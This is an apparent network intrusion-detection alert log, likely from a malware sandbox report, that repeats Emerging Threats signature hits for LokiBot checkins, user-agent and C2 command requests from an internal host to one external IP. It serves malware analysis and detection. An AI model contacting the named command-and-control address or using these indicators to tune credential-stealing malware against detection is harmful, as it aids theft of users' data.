                                11/22/21-15:31:06.917649TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24992780192.168.11.20192.185.217.246
                                11/22/21-15:31:07.767507TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14992880192.168.11.20192.185.217.246
                                11/22/21-15:31:07.767507TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4992880192.168.11.20192.185.217.246
                                11/22/21-15:31:07.767507TCP2025381ET TROJAN LokiBot Checkin4992880192.168.11.20192.185.217.246
                                11/22/21-15:31:07.767507TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24992880192.168.11.20192.185.217.246
                                11/22/21-15:31:08.565990TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14992980192.168.11.20192.185.217.246
                                11/22/21-15:31:58.943524TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4999180192.168.11.20192.185.217.246
                                11/22/21-15:31:58.943524TCP2025381ET TROJAN LokiBot Checkin4999180192.168.11.20192.185.217.246
                                11/22/21-15:31:58.943524TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24999180192.168.11.20192.185.217.246
                                11/22/21-15:31:59.742859TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14999280192.168.11.20192.185.217.246
                                11/22/21-15:31:59.742859TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4999280192.168.11.20192.185.217.246
                                11/22/21-15:31:59.742859TCP2025381ET TROJAN LokiBot Checkin4999280192.168.11.20192.185.217.246
                                11/22/21-15:31:59.742859TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24999280192.168.11.20192.185.217.246
                                11/22/21-15:32:00.548597TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14999380192.168.11.20192.185.217.246
                                11/22/21-15:32:00.548597TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4999380192.168.11.20192.185.217.246
                                11/22/21-15:32:00.548597TCP2025381ET TROJAN LokiBot Checkin4999380192.168.11.20192.185.217.246
                                11/22/21-15:32:00.548597TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24999380192.168.11.20192.185.217.246
                                11/22/21-15:32:01.311727TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14999480192.168.11.20192.185.217.246
                                11/22/21-15:32:01.311727TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4999480192.168.11.20192.185.217.246
                                11/22/21-15:32:01.311727TCP2025381ET TROJAN LokiBot Checkin4999480192.168.11.20192.185.217.246
                                11/22/21-15:32:01.311727TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24999480192.168.11.20192.185.217.246
                                11/22/21-15:32:02.197056TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14999580192.168.11.20192.185.217.246
                                11/22/21-15:32:02.197056TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4999580192.168.11.20192.185.217.246
                                11/22/21-15:32:02.197056TCP2025381ET TROJAN LokiBot Checkin4999580192.168.11.20192.185.217.246
                                11/22/21-15:32:02.197056TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24999580192.168.11.20192.185.217.246
                                11/22/21-15:32:03.201506TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14999680192.168.11.20192.185.217.246
                                11/22/21-15:32:03.201506TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4999680192.168.11.20192.185.217.246
                                11/22/21-15:32:03.201506TCP2025381ET TROJAN LokiBot Checkin4999680192.168.11.20192.185.217.246
                                11/22/21-15:32:03.201506TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24999680192.168.11.20192.185.217.246
                                11/22/21-15:32:04.087491TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14999780192.168.11.20192.185.217.246
                                11/22/21-15:32:04.087491TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4999780192.168.11.20192.185.217.246
                                11/22/21-15:32:04.087491TCP2025381ET TROJAN LokiBot Checkin4999780192.168.11.20192.185.217.246
                                11/22/21-15:32:04.087491TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24999780192.168.11.20192.185.217.246
                                11/22/21-15:32:04.925852TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14999880192.168.11.20192.185.217.246
                                11/22/21-15:32:04.925852TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4999880192.168.11.20192.185.217.246
                                11/22/21-15:32:04.925852TCP2025381ET TROJAN LokiBot Checkin4999880192.168.11.20192.185.217.246
                                11/22/21-15:32:04.925852TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24999880192.168.11.20192.185.217.246
                                11/22/21-15:32:05.935576TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14999980192.168.11.20192.185.217.246
                                11/22/21-15:32:05.935576TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4999980192.168.11.20192.185.217.246
                                11/22/21-15:32:05.935576TCP2025381ET TROJAN LokiBot Checkin4999980192.168.11.20192.185.217.246
                                11/22/21-15:32:05.935576TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24999980192.168.11.20192.185.217.246
                                11/22/21-15:32:06.769989TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15000080192.168.11.20192.185.217.246
                                11/22/21-15:32:06.769989TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5000080192.168.11.20192.185.217.246
                                11/22/21-15:32:06.769989TCP2025381ET TROJAN LokiBot Checkin5000080192.168.11.20192.185.217.246
                                11/22/21-15:32:06.769989TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25000080192.168.11.20192.185.217.246
                                11/22/21-15:32:07.714965TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15000180192.168.11.20192.185.217.246
                                11/22/21-15:32:07.714965TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5000180192.168.11.20192.185.217.246
                                11/22/21-15:32:07.714965TCP2025381ET TROJAN LokiBot Checkin5000180192.168.11.20192.185.217.246
                                11/22/21-15:32:07.714965TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25000180192.168.11.20192.185.217.246
                                11/22/21-15:32:08.577568TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15000280192.168.11.20192.185.217.246
                                11/22/21-15:32:08.577568TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5000280192.168.11.20192.185.217.246
                                11/22/21-15:32:08.577568TCP2025381ET TROJAN LokiBot Checkin5000280192.168.11.20192.185.217.246
                                11/22/21-15:32:08.577568TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25000280192.168.11.20192.185.217.246
                                11/22/21-15:32:09.359679TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15000380192.168.11.20192.185.217.246
                                11/22/21-15:32:09.359679TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5000380192.168.11.20192.185.217.246
                                11/22/21-15:32:09.359679TCP2025381ET TROJAN LokiBot Checkin5000380192.168.11.20192.185.217.246
                                11/22/21-15:32:09.359679TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25000380192.168.11.20192.185.217.246
                                11/22/21-15:32:10.196935TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15000480192.168.11.20192.185.217.246
                                11/22/21-15:32:10.196935TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5000480192.168.11.20192.185.217.246
                                11/22/21-15:32:10.196935TCP2025381ET TROJAN LokiBot Checkin5000480192.168.11.20192.185.217.246
                                11/22/21-15:32:10.196935TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25000480192.168.11.20192.185.217.246
                                11/22/21-15:32:11.039158TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15000580192.168.11.20192.185.217.246
                                11/22/21-15:32:11.039158TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5000580192.168.11.20192.185.217.246
                                11/22/21-15:32:11.039158TCP2025381ET TROJAN LokiBot Checkin5000580192.168.11.20192.185.217.246
                                11/22/21-15:32:11.039158TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25000580192.168.11.20192.185.217.246
                                11/22/21-15:32:11.829931TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15000680192.168.11.20192.185.217.246
                                11/22/21-15:32:11.829931TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5000680192.168.11.20192.185.217.246
                                11/22/21-15:32:11.829931TCP2025381ET TROJAN LokiBot Checkin5000680192.168.11.20192.185.217.246
                                11/22/21-15:32:11.829931TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25000680192.168.11.20192.185.217.246
                                11/22/21-15:32:12.718771TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15000780192.168.11.20192.185.217.246
                                11/22/21-15:32:12.718771TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5000780192.168.11.20192.185.217.246
                                11/22/21-15:32:12.718771TCP2025381ET TROJAN LokiBot Checkin5000780192.168.11.20192.185.217.246
                                11/22/21-15:32:12.718771TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25000780192.168.11.20192.185.217.246
                                11/22/21-15:32:13.544515TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15000880192.168.11.20192.185.217.246
                                11/22/21-15:32:13.544515TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5000880192.168.11.20192.185.217.246
                                11/22/21-15:32:13.544515TCP2025381ET TROJAN LokiBot Checkin5000880192.168.11.20192.185.217.246
                                11/22/21-15:32:13.544515TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25000880192.168.11.20192.185.217.246
                                11/22/21-15:32:14.363570TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15000980192.168.11.20192.185.217.246
                                11/22/21-15:32:14.363570TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5000980192.168.11.20192.185.217.246
                                11/22/21-15:32:14.363570TCP2025381ET TROJAN LokiBot Checkin5000980192.168.11.20192.185.217.246
                                11/22/21-15:32:14.363570TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25000980192.168.11.20192.185.217.246
                                11/22/21-15:32:15.199945TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15001080192.168.11.20192.185.217.246
                                11/22/21-15:32:15.199945TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5001080192.168.11.20192.185.217.246
                                11/22/21-15:32:15.199945TCP2025381ET TROJAN LokiBot Checkin5001080192.168.11.20192.185.217.246
                                11/22/21-15:32:15.199945TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25001080192.168.11.20192.185.217.246
                                11/22/21-15:32:16.047013TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15001180192.168.11.20192.185.217.246
                                11/22/21-15:32:16.047013TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5001180192.168.11.20192.185.217.246
                                11/22/21-15:32:16.047013TCP2025381ET TROJAN LokiBot Checkin5001180192.168.11.20192.185.217.246
                                11/22/21-15:32:16.047013TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25001180192.168.11.20192.185.217.246
                                11/22/21-15:32:16.869696TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15001280192.168.11.20192.185.217.246
                                11/22/21-15:32:16.869696TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5001280192.168.11.20192.185.217.246
                                11/22/21-15:32:16.869696TCP2025381ET TROJAN LokiBot Checkin5001280192.168.11.20192.185.217.246
                                11/22/21-15:32:16.869696TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25001280192.168.11.20192.185.217.246
                                11/22/21-15:32:17.706048TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15001380192.168.11.20192.185.217.246
                                11/22/21-15:32:17.706048TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5001380192.168.11.20192.185.217.246
                                11/22/21-15:32:17.706048TCP2025381ET TROJAN LokiBot Checkin5001380192.168.11.20192.185.217.246
                                11/22/21-15:32:17.706048TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25001380192.168.11.20192.185.217.246
                                11/22/21-15:32:18.525083TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15001480192.168.11.20192.185.217.246
                                11/22/21-15:32:18.525083TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5001480192.168.11.20192.185.217.246
                                11/22/21-15:32:18.525083TCP2025381ET TROJAN LokiBot Checkin5001480192.168.11.20192.185.217.246
                                11/22/21-15:32:18.525083TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25001480192.168.11.20192.185.217.246
                                11/22/21-15:32:19.311133TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15001580192.168.11.20192.185.217.246
                                11/22/21-15:32:19.311133TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5001580192.168.11.20192.185.217.246
                                11/22/21-15:32:19.311133TCP2025381ET TROJAN LokiBot Checkin5001580192.168.11.20192.185.217.246
                                11/22/21-15:32:19.311133TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25001580192.168.11.20192.185.217.246
                                11/22/21-15:32:20.130578TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15001680192.168.11.20192.185.217.246
                                11/22/21-15:32:20.130578TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5001680192.168.11.20192.185.217.246
                                11/22/21-15:32:20.130578TCP2025381ET TROJAN LokiBot Checkin5001680192.168.11.20192.185.217.246
                                11/22/21-15:32:20.130578TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25001680192.168.11.20192.185.217.246
                                11/22/21-15:32:20.853977TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15001780192.168.11.20192.185.217.246
                                11/22/21-15:32:20.853977TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5001780192.168.11.20192.185.217.246
                                11/22/21-15:32:20.853977TCP2025381ET TROJAN LokiBot Checkin5001780192.168.11.20192.185.217.246
                                11/22/21-15:32:20.853977TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25001780192.168.11.20192.185.217.246
                                11/22/21-15:32:21.685625TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15001880192.168.11.20192.185.217.246
                                11/22/21-15:32:21.685625TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5001880192.168.11.20192.185.217.246
                                11/22/21-15:32:21.685625TCP2025381ET TROJAN LokiBot Checkin5001880192.168.11.20192.185.217.246
                                11/22/21-15:32:21.685625TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25001880192.168.11.20192.185.217.246
                                11/22/21-15:32:22.577250TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15001980192.168.11.20192.185.217.246
                                11/22/21-15:32:22.577250TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5001980192.168.11.20192.185.217.246
                                11/22/21-15:32:22.577250TCP2025381ET TROJAN LokiBot Checkin5001980192.168.11.20192.185.217.246
                                11/22/21-15:32:22.577250TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25001980192.168.11.20192.185.217.246
                                11/22/21-15:32:23.316326TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15002080192.168.11.20192.185.217.246
                                11/22/21-15:32:23.316326TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5002080192.168.11.20192.185.217.246
                                11/22/21-15:32:23.316326TCP2025381ET TROJAN LokiBot Checkin5002080192.168.11.20192.185.217.246
                                11/22/21-15:32:23.316326TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25002080192.168.11.20192.185.217.246
                                11/22/21-15:32:24.148117TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15002180192.168.11.20192.185.217.246
                                11/22/21-15:32:24.148117TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5002180192.168.11.20192.185.217.246
                                11/22/21-15:32:24.148117TCP2025381ET TROJAN LokiBot Checkin5002180192.168.11.20192.185.217.246
                                11/22/21-15:32:24.148117TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25002180192.168.11.20192.185.217.246
                                11/22/21-15:32:24.996619TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15002280192.168.11.20192.185.217.246
                                11/22/21-15:32:24.996619TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5002280192.168.11.20192.185.217.246
                                11/22/21-15:32:24.996619TCP2025381ET TROJAN LokiBot Checkin5002280192.168.11.20192.185.217.246
                                11/22/21-15:32:24.996619TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25002280192.168.11.20192.185.217.246
                                11/22/21-15:32:25.791047TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15002380192.168.11.20192.185.217.246
                                11/22/21-15:32:25.791047TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5002380192.168.11.20192.185.217.246
                                11/22/21-15:32:25.791047TCP2025381ET TROJAN LokiBot Checkin5002380192.168.11.20192.185.217.246
                                11/22/21-15:32:25.791047TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25002380192.168.11.20192.185.217.246
                                11/22/21-15:32:26.551736TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15002480192.168.11.20192.185.217.246
                                11/22/21-15:32:26.551736TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5002480192.168.11.20192.185.217.246
                                11/22/21-15:32:26.551736TCP2025381ET TROJAN LokiBot Checkin5002480192.168.11.20192.185.217.246
                                11/22/21-15:32:26.551736TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25002480192.168.11.20192.185.217.246
                                11/22/21-15:32:27.404429TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15002580192.168.11.20192.185.217.246
                                11/22/21-15:32:27.404429TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5002580192.168.11.20192.185.217.246
                                11/22/21-15:32:27.404429TCP2025381ET TROJAN LokiBot Checkin5002580192.168.11.20192.185.217.246
                                11/22/21-15:32:27.404429TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25002580192.168.11.20192.185.217.246
                                11/22/21-15:32:28.370436TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15002680192.168.11.20192.185.217.246
                                11/22/21-15:32:28.370436TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5002680192.168.11.20192.185.217.246
                                11/22/21-15:32:28.370436TCP2025381ET TROJAN LokiBot Checkin5002680192.168.11.20192.185.217.246
                                11/22/21-15:32:28.370436TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25002680192.168.11.20192.185.217.246
                                11/22/21-15:32:29.173776TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15002780192.168.11.20192.185.217.246
                                11/22/21-15:32:29.173776TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5002780192.168.11.20192.185.217.246
                                11/22/21-15:32:29.173776TCP2025381ET TROJAN LokiBot Checkin5002780192.168.11.20192.185.217.246
                                11/22/21-15:32:29.173776TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25002780192.168.11.20192.185.217.246
                                11/22/21-15:32:29.937674TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15002880192.168.11.20192.185.217.246
                                11/22/21-15:32:29.937674TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5002880192.168.11.20192.185.217.246
                                11/22/21-15:32:29.937674TCP2025381ET TROJAN LokiBot Checkin5002880192.168.11.20192.185.217.246
                                11/22/21-15:32:29.937674TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25002880192.168.11.20192.185.217.246
                                11/22/21-15:32:30.809686TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15002980192.168.11.20192.185.217.246
                                11/22/21-15:32:30.809686TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5002980192.168.11.20192.185.217.246
                                11/22/21-15:32:30.809686TCP2025381ET TROJAN LokiBot Checkin5002980192.168.11.20192.185.217.246
                                11/22/21-15:32:30.809686TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25002980192.168.11.20192.185.217.246
                                11/22/21-15:32:31.593341TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15003080192.168.11.20192.185.217.246
                                11/22/21-15:32:31.593341TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5003080192.168.11.20192.185.217.246
                                11/22/21-15:32:31.593341TCP2025381ET TROJAN LokiBot Checkin5003080192.168.11.20192.185.217.246
                                11/22/21-15:32:31.593341TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25003080192.168.11.20192.185.217.246
                                11/22/21-15:32:32.355965TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15003180192.168.11.20192.185.217.246
                                11/22/21-15:32:32.355965TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5003180192.168.11.20192.185.217.246
                                11/22/21-15:32:32.355965TCP2025381ET TROJAN LokiBot Checkin5003180192.168.11.20192.185.217.246
                                11/22/21-15:32:32.355965TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25003180192.168.11.20192.185.217.246
                                11/22/21-15:32:33.167437TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15003280192.168.11.20192.185.217.246
                                11/22/21-15:32:33.167437TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5003280192.168.11.20192.185.217.246
                                11/22/21-15:32:33.167437TCP2025381ET TROJAN LokiBot Checkin5003280192.168.11.20192.185.217.246
                                11/22/21-15:32:33.167437TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25003280192.168.11.20192.185.217.246
                                11/22/21-15:32:33.978440TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15003380192.168.11.20192.185.217.246
                                11/22/21-15:32:33.978440TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5003380192.168.11.20192.185.217.246
                                11/22/21-15:32:33.978440TCP2025381ET TROJAN LokiBot Checkin5003380192.168.11.20192.185.217.246
                                11/22/21-15:32:33.978440TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25003380192.168.11.20192.185.217.246
                                11/22/21-15:32:34.838886TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15003480192.168.11.20192.185.217.246
                                11/22/21-15:32:34.838886TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5003480192.168.11.20192.185.217.246
                                11/22/21-15:32:34.838886TCP2025381ET TROJAN LokiBot Checkin5003480192.168.11.20192.185.217.246
                                11/22/21-15:32:34.838886TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25003480192.168.11.20192.185.217.246
                                11/22/21-15:32:35.657636TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15003580192.168.11.20192.185.217.246
                                11/22/21-15:32:35.657636TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5003580192.168.11.20192.185.217.246
                                11/22/21-15:32:35.657636TCP2025381ET TROJAN LokiBot Checkin5003580192.168.11.20192.185.217.246
                                11/22/21-15:32:35.657636TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25003580192.168.11.20192.185.217.246
                                11/22/21-15:32:36.485301TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15003680192.168.11.20192.185.217.246
                                11/22/21-15:32:36.485301TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5003680192.168.11.20192.185.217.246
                                11/22/21-15:32:36.485301TCP2025381ET TROJAN LokiBot Checkin5003680192.168.11.20192.185.217.246
                                11/22/21-15:32:36.485301TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25003680192.168.11.20192.185.217.246
                                11/22/21-15:32:37.229667TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15003780192.168.11.20192.185.217.246
                                11/22/21-15:32:37.229667TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5003780192.168.11.20192.185.217.246
                                11/22/21-15:32:37.229667TCP2025381ET TROJAN LokiBot Checkin5003780192.168.11.20192.185.217.246
                                11/22/21-15:32:37.229667TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25003780192.168.11.20192.185.217.246
                                11/22/21-15:32:38.046982TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15003880192.168.11.20192.185.217.246
                                11/22/21-15:32:38.046982TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5003880192.168.11.20192.185.217.246
                                11/22/21-15:32:38.046982TCP2025381ET TROJAN LokiBot Checkin5003880192.168.11.20192.185.217.246
                                11/22/21-15:32:38.046982TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25003880192.168.11.20192.185.217.246
                                11/22/21-15:32:38.882231TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15003980192.168.11.20192.185.217.246
                                11/22/21-15:33:29.767328TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5010180192.168.11.20192.185.217.246
                                11/22/21-15:33:29.767328TCP2025381ET TROJAN LokiBot Checkin5010180192.168.11.20192.185.217.246
                                11/22/21-15:33:29.767328TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25010180192.168.11.20192.185.217.246
                                11/22/21-15:33:30.513001TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15010280192.168.11.20192.185.217.246
                                11/22/21-15:33:30.513001TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5010280192.168.11.20192.185.217.246
                                11/22/21-15:33:30.513001TCP2025381ET TROJAN LokiBot Checkin5010280192.168.11.20192.185.217.246
                                11/22/21-15:33:30.513001TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25010280192.168.11.20192.185.217.246
                                11/22/21-15:33:31.328618TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15010380192.168.11.20192.185.217.246
                                11/22/21-15:33:31.328618TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5010380192.168.11.20192.185.217.246
                                11/22/21-15:33:31.328618TCP2025381ET TROJAN LokiBot Checkin5010380192.168.11.20192.185.217.246
                                11/22/21-15:33:31.328618TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25010380192.168.11.20192.185.217.246
                                11/22/21-15:33:32.115998TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15010480192.168.11.20192.185.217.246
                                11/22/21-15:33:32.115998TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5010480192.168.11.20192.185.217.246
                                11/22/21-15:33:32.115998TCP2025381ET TROJAN LokiBot Checkin5010480192.168.11.20192.185.217.246
                                11/22/21-15:33:32.115998TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25010480192.168.11.20192.185.217.246
                                11/22/21-15:33:32.932694TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15010580192.168.11.20192.185.217.246
                                11/22/21-15:33:32.932694TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5010580192.168.11.20192.185.217.246
                                11/22/21-15:33:32.932694TCP2025381ET TROJAN LokiBot Checkin5010580192.168.11.20192.185.217.246
                                11/22/21-15:33:32.932694TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25010580192.168.11.20192.185.217.246
                                11/22/21-15:33:33.764572TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15010680192.168.11.20192.185.217.246
                                11/22/21-15:33:33.764572TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5010680192.168.11.20192.185.217.246
                                11/22/21-15:33:33.764572TCP2025381ET TROJAN LokiBot Checkin5010680192.168.11.20192.185.217.246
                                11/22/21-15:33:33.764572TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25010680192.168.11.20192.185.217.246
                                11/22/21-15:33:34.590383TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15010780192.168.11.20192.185.217.246
                                11/22/21-15:33:34.590383TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5010780192.168.11.20192.185.217.246
                                11/22/21-15:33:34.590383TCP2025381ET TROJAN LokiBot Checkin5010780192.168.11.20192.185.217.246
                                11/22/21-15:33:34.590383TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25010780192.168.11.20192.185.217.246
                                11/22/21-15:33:35.418876TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15010880192.168.11.20192.185.217.246
                                11/22/21-15:33:35.418876TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5010880192.168.11.20192.185.217.246
                                11/22/21-15:33:35.418876TCP2025381ET TROJAN LokiBot Checkin5010880192.168.11.20192.185.217.246
                                11/22/21-15:33:35.418876TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25010880192.168.11.20192.185.217.246
                                11/22/21-15:33:36.177037TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15010980192.168.11.20192.185.217.246
                                11/22/21-15:33:36.177037TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5010980192.168.11.20192.185.217.246
                                11/22/21-15:33:36.177037TCP2025381ET TROJAN LokiBot Checkin5010980192.168.11.20192.185.217.246
                                11/22/21-15:33:36.177037TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25010980192.168.11.20192.185.217.246
                                11/22/21-15:33:36.979083TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15011080192.168.11.20192.185.217.246
                                11/22/21-15:33:36.979083TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5011080192.168.11.20192.185.217.246
                                11/22/21-15:33:36.979083TCP2025381ET TROJAN LokiBot Checkin5011080192.168.11.20192.185.217.246
                                11/22/21-15:33:36.979083TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25011080192.168.11.20192.185.217.246
